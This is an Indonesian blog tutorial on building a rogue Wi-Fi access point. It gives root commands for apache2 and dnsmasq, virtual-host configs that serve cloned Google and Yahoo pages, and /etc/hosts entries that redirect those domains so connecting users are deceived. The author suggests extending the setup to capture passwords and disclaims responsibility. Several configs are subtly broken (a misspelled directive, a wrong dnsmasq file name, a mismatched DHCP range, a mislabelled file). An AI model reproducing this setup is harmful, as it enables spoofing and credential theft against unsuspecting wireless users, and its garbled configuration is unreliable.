fight_against_software_piracy

January 16, 2008

Rouge Access Point

Filed under: Networks, Hacking - Administrator @ 5:27 am

Untuk menjebak user dengan access point, sekarang anda dapat membuat access point palsu sebagai pembuktian teori sederhana. Yang perlu anda persiapkan antara lain:
1.Web server
2.dns server
3.Web palsu

Mulai membuat access point palsu serta halaman-halaman web palsu. halaman web palsu yang akan kita siapkan pada server lokal adalah halaman web dari www.google.com dan halaman www.yahoo.com.

Buka terminal dan login-lah sebagai root, lalu ikutilah langkah-langkah berikut:
1.Pertama, intall web server dan dns dalam hal ini web server yang digunakan apache2 dan dnsmasq:

# apt-get install apache2 dnsmasq

2.Kedua, buatlah direktori untuk meletakkan halaman web palsu:

# mkdir -p /home/www/rouge/google.com
# mkdir -p /home/www/rouge/yahoo.com

Simpan website dari google.com dan yahoo.com sesuai direktori yang telah dibuat, laku konfigurasi web server apache sebagai berikut:

# vi /etc/apache2/sites-available/rouge.google.com

Isi file /etc/apache2/sites-available/rouge.google.com dengan konfigurasi berikut:

NamaVirtualHost *

ServerName google.com
ServerAlias www.google.com
DocumentRoot /home/www/rouge/google.com

Options FollowSymLinks
AllowOverride None


Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all

Simpan konfigurasi tersebut dan keluar, lalu lakukan hal yang sama untuk membuat konfigurasi dari website yahoo.com palsu, sebagai berikut:

# vi /etc/apache2/sites-available/rouge.yahoo.com

Isi file /etc/apache2/sites-available/rouge.google.com dengan konfigurasi berikut:

NamaVirtualHost *

ServerName yahoo.com
ServerAlias www.yahoo.com
DocumentRoot /home/www/rouge/yahoo.com

Options FollowSymLinks
AllowOverride None


Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all

Simpan konfigurasi tersebut dan keluar.

3.Ketiga, mengaktifkan konfigurasi situs palsu tersebut dengan perintah sebagai berikut:

# a2ensite rouge.google.com
# a2ensite rouge.yahoo.com

Sampai disini kita telah membuat dua website palsu, selanjutnya adalah mempersiapkan DHCP server yang akan memberikan IP address kepada client, serta berfungsi sebagai DNS server.

4.Keempat, konfigurasi DNS server, sebagai berikut:

#vi /etc/dnsmasq.com

Isikan file /etc/dnsmasq.com dengan konfigurasi berikut:

interface=eth0
domain=riverside.com
dhcp-lease-max=50
dhcp-authoritative
dhcp-range=192.168.0.10,192.168.1.100,1440m

Simpan konfigurasi tersebut dan keluar. Selanjutnya, membuat record host name dari kedua domain tersebut.

5.Kelima, membuat Record Host Name, sebagai berikut:

# vi /etc/hosts

Isikan file ini pada /etc/hosts dengan kedua record domain tersebut seperti:

192.168.0.1 www.google.com
192.168.0.1 google.com
192.168.0.1 www.yahoo.com
192.168.0.1 yahoo.com

Sampai disini persiapan hampir lengkap, konfigurasi wireless card anda dan jalankan web server serta dns server, dengan perintah:

# /etc/init.d/network restart
# /etc/init.d/apache2 restart
# /etc/init.d/dnsmasq restart

Setelah semua berjalan dengan dengan baik, anda tinggal menunggu client yang terkoneksi dengan access point anda dan melihat hasilnya. Yang kita lakukan hanyalah membuat access point sederhana yang dapat menipu client. Bayangkan jika kita memodifikasi agar dapat menangkap password dari user, bukankah akan sangat berbahaya bagi client yang tidak tahu apa-apa?.

Hacking adalah seni dan keilmuan, sehingga segala penyalahgunaan artikel ini diluar tanggung jawab penulis.

Comments »

The URI to TrackBack this entry is: http://amaronly.blogsome.com/2008/01/16/rouge-access-point/trackback/

No comments yet.

RSS feed for comments on this post.

Leave a comment

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>



Anti-spam measure: please retype the above text into the box provided.

Get free blog up and running in minutes with Blogsome
Theme designed by Alex King